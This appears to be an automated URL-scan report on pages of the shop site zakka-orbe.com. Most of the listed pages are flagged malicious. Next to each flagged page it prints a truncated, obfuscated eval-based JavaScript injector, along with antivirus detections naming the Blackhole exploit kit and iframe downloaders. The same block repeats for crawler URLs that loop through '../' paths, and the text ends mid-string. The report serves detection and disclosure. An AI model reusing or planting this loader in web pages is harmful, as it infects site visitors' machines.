Request | Server response | Status |
http://zakka-orbe.com/ | 200 OK Content-Length: 68907 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://zakka-orbe.com/item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/aboutus.htm | 200 OK Content-Length: 45280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/aboutus.htm | 200 OK Content-Length: 45280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/aboutus.htm | 200 OK Content-Length: 45280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/aboutus.htm | 200 OK Content-Length: 45280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/aboutus.htm | 200 OK Content-Length: 45280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
